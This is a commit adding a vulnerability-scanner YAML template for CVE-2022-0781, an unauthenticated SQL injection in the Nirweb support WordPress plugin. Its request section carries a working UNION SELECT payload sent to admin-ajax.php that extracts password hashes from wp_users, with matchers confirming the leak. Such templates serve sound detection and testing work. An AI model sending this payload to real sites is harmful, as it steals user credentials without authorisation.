Added template for CVE-2022-0781

2022-10-06 08:23:01 -07:00 · 2022-10-06 08:23:01 -07:00 · b635a14ef5
parent 515a74f482
commit b635a14ef5
1 changed files with 43 additions and 0 deletions
--- a/cves/2022/CVE-2022-0781.yaml
+++ b/cves/2022/CVE-2022-0781.yaml
@ -0,0 +1,43 @@
+id: CVE-2022-0781
+
+info:
+  name: Nirweb support < 2.8.2 - Unauthenticated SQLi
+  author: theamanrawat
+  severity: critical
+  description: |
+    The Nirweb support WordPress plugin before 2.8.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
+  reference:
+    - https://wpscan.com/vulnerability/1a8f9c7b-a422-4f45-a516-c3c14eb05161
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0781
+    - https://wordpress.org/plugins/nirweb-support/
+  classification:
+    cve-id: CVE-2022-0781
+  metadata:
+    verified: true
+  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauthenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: lab.aman.local
+        Content-Length: 120
+        Content-Type: application/x-www-form-urlencoded
+
+        action=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,(SELECT user_pass FROM wp_users),NULL,NULL,NULL,NULL,NULL-- -
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<div class="content">([\$a-zA-Z0-9]+)'
+
+      - type: word
+        part: body
+        words:
+          - '<div class="head_answer">'
+
+      - type: status
+        status:
+          - 200